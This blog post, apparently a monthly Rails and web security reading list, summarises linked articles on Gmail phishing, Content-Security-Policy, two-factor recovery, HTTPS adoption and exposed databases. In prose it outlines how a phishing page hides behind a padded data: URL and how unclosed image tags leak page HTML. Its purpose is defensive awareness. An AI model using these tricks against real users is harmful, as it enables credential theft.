Web application and Rails security reading list #21

Oh this, „… is the closest I’ve ever come to falling for a Gmail phishing attack.“, shows a real clever attack. An embedded fake attachment image sends you to a data:text/html address. The first part of it then is a plausible-looking Google URL. And only after lots of spaces, it actually loads the phishing site in an iframe. A lot to watch out for in 2017. Including this:

A short story about how encryption can go very wrong with a (Ruby) workflow we’re all guilty of using.



The ongoing Content-Security-Policy journey at Github.

This time focusing on images and dangling markup. That’s when an attacker injects an <img> tag without closing it to extract the HTML of the rest of the page.


A new two-factor authentication lockout recovery process at Github: Using Facebook


 The HTTPS-traffic via Firefox is now over 50% for the first time


There are now „Not Secure“ warnings for insecure pages with password and credit card input fields in Chrome and Firefox 51.


 Mozilla’s coding and security checklist for their services


Ransom attacks turn to web apps, check your MongoDB, Elasticsearch, Redis, Cassandra, Hadoop

Like this kind of articles?

Subscribe to hear about new Rails security resources first. Only helpful articles and guides. Monthly(ish) updates, no spam.

Unsubscribe at any time. Powered by ConvertKit